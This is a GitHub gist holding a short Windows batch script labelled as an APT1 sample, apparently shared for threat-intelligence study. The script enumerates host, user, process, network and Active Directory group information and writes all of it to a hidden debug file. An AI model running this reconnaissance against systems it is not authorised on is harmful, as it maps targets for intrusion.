Created
February 21, 2013 04:45
-
-
Save hackingbutlegal/5002152 to your computer and use it in GitHub Desktop.
APT1 Batch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| ipconfig /all>>”C:\WINNT\Debug\1.txt” | |
| net start>>”C:\WINNT\Debug\1.txt” | |
| tasklist /v>>”C:\WINNT\Debug\1.txt” | |
| net user >>”C:\WINNT\Debug\1.txt” | |
| net localgroup administrators>>”C:\WINNT\Debug\1.txt” | |
| netstat -ano>>”C:\WINNT\Debug\1.txt” | |
| net use>>”C:\WINNT\Debug\1.txt” | |
| net view>>”C:\WINNT\Debug\1.txt” | |
| net view /domain>>”C:\WINNT\Debug\1.txt” | |
| net group /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “domain users” /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “domain admins” /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “domain controllers” /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “exchange domain servers” /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “exchange servers” /domain>>”C:\WINNT\Debug\1.txt” | |
| net group “domain computers” /domain>>”C:\WINNT\Debug\1.txt” |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment